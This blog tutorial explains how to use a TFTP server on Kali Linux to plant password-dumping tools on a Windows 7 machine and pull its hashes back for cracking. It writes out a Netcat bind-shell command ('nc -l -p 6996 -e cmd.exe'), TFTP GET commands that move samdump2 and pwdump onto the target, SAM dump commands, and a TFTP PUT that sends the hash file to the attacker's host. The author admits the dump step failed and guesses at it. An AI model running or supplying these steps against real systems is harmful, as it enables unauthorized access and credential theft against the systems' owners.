Sometimes, getting a foothold on a target system with Metasploit doesn’t always go as planned. When that happens, it’s essential to find alternative ways to gain control. One reliable method is to obtain a command shell on the target system through various means.
Netcat or its secure cousin, Cryptcat, are often the go-to tools for connecting to a target system’s command shell. Once we have that access, the next step is to upload additional software to fully take over and manage the system.
This is where TFTP (Trivial File Transfer Protocol) comes into play. TFTP allows us to transfer files to the target system quickly and with minimal fuss, making it a valuable tool in our hacking toolkit.
How TFTP works
TFTP is a UDP/IP protocol that uses port 69. It is used to upload (GET) and download (PUT) files without an authentication process between computers. It operates in a Client/Server structure. If you install and use a TFTP server on the Kali system, you can upload hacking software to the target system through the command line.
For example, if you want to intercept and crack password hash files, you need to upload samdump2 and pwdump to the target system as shown in this tutorial. After intercepting the password hash, you can use TFTP to download the password hash file to Kali Linux. You will also be able to find out the password by cracking the password hash file downloaded with Kali Linux.
A quick tip. Let’s learn about TFTP .
What is TFTP?
Trivial File Transfer Protocol is a protocol for transferring files, similar to FTP. TFTP is designed to be lightweight and easy to implement, making it ideal for situations where simplicity and minimal overhead are more critical than advanced features.
Transfer files in a simpler way than FTP.
FTP Vs TFTP
| FTP | TFTP |
| TCP based | UDP-based |
| Use ports 20 and 21 | Use port 69 |
| There is a login procedure. | There is no login process. |
| You can view the file directory (DIR). | The file directory cannot be viewed. |
What system is the TFTP Client on?
TFTP Client is installed on almost all OSs, but it is not always activated. In Windows XP and earlier OSs, the TFTP Client is activated by default. In Windows Vista and later OSs, TFTP must be enabled through the Control Panel. System administrators often enable the TFTP Client for administrative purposes and leave it as is.
Unix/Linux is enabled by default. Many network switches and routers are also enabled to upload and download new configuration files. If we have a TFTP server, we can upload and download software to the target system.
Kali Linux has an advanced TFTP (aTFTP) server installed by default.
We can use it to upload and download software to the target machine.
Using TFTP to install software on the target
In this tutorial, we will upload password-cracking software to Windows 7 (originally targeting Windows Server 2003) with the TFTP client enabled. By uploading password-cracking software to your target, you can intercept the password hash, download it, and crack it.
Let’s take a look at how to activate the TFTP client in Windows 7.
A quick tip. Activating Windows 7 TFTP Client
It is well explained on the site below.
http://avtech.com/Support/faq/162/how-to-enable-tftp-in-windows-versions-vista-and-above/
I tried to reproduce it with Windows Server 2003 as in the original, but I couldn’t find a way to activate the TFTP client on Windows Server 2003. If anyone reading this post knows how to enable the TFTP client in Windows Server 2003, please let me know in the comments.
Anyway, I’ll just test it on Windows 7 instead.
To check whether the TFTP client is properly activated on Windows 7, the target system, type the TFTP command in the command window and the result appears as shown in the picture below.
<Reproduction environment>
| division | OS | IP address |
| Attacker | Kali Linux 2.0 | 192.168.0.51 |
| Victim | Windows 7 Professional | 192.168.0.54 |
Step 1: Run Kali & open the terminal
Run Kali Linux and open a terminal.
Step 2: Run the TFTP server and create a TFTP directory.
The first step is to run the aTFTP (atftpd) server.
Kali > service atftpd start
Then, create a directory to upload the malicious software to.
Kali > mkdir /tftpboot
Step 3: Edit the configuration file
Next, you need to modify the atftpd configuration file. You can open it with Text Editor, but here
I will use Leafpad.
Kali > leafpad /etc/default/atftpd
Modify and save as shown above.
You must restart the aTFTP server for the new settings to take effect.
Kali > /etc/init.d/atftpd restart
Step 4: Copy the malware.
Next, you need to copy the malware to the /tftpboot directory.
First, navigate to the directory where the malware is located. Let’s find the file using the find command.
It is located in /usr/bin.
Kali > cd /usr/bin
Then copy them to the /tftpboot directory.
Kali > cp samdump2 /tftpboot
Kali > cp pwdump /tftpboot
Step 5: Connect to the target.
If you want to upload malware, you need to connect to the target machine.
You must obtain a command shell using Metasploit or another method.
We will use Netcat here.
First, the Netcat listener must be running on the target system. Only then will you be able to connect to the target from Kali. In Windows 7, use the command below to open a command window when connecting to Netcat.
Windows 7 > nc -l -p 6996 -e cmd.exe
Let’s check if it’s listening with the netstat command.
As shown in the picture above, you can see that it is listening to port 6996.
Let’s connect to the target system in Kali.
Kali > nc 192.168.0.54 6996
As you can see, it connects to the Windows machine as shown below through the command shell provided by the Netcat listener on the target system.
Step 6: Move malware to target
After completing the setup of the aTFTP server and inserting the intended software into the /tftpboot directory, I connected to the target system via Netcat. You can now upload malware to your Windows system.
Upload is possible through the following command in the command shell of a Windows system connected to Kali Linux.
C:\>tftp -i 192.168.0.51 GET samdump2
C:\>tftp -i 192.168.0.51 GET pwdump
You can confirm that malware has been successfully uploaded to the Windows system through the dir command.
Step 7: Download password hash file
Once you have uploaded pwdump and samdump2 to the target system, you can now intercept the hash file.
There is no explanation in the original text, but I think you should first save the dump file of the Windows hash file through the uploaded pwdump and samdump2 programs.
samdump2 and pwdump imported from Kali are not executable files, so it seems that you need to change them to executable files first.
C:\>copy samdump2 samdump2.exe
C:\>copy pwdump pwdump.exe
To dump the hash file, run the command below in a command shell ( Kali) attached to Netcat .
C:\>samdump2.exe > samdump_hash.txt
C:\> pwdump.exe > pwdump_hash.txt
In my case, I could not access the SAM file because the account logged on to the Windows system was a general user account. ( Access Denied!!) If you gain administrator privileges, it is believed that you can dump the password hash file into a samdump_hash.txt or pwdump_hash.txt file using the command above and follow the method shown below. (I guess so…………??)
C:\> tftp -i 192.168.0.51 PUT pwdump_hash.txt
This command will send the pwdump_hash.txt file to the Kali Linux /tftpboot directory.
Then, you will be able to crack the password hash using Hashcat or John the Ripper program in Kali Linux.
❤️ If you liked the article, like and subscribe to my channel “Codelivly”.
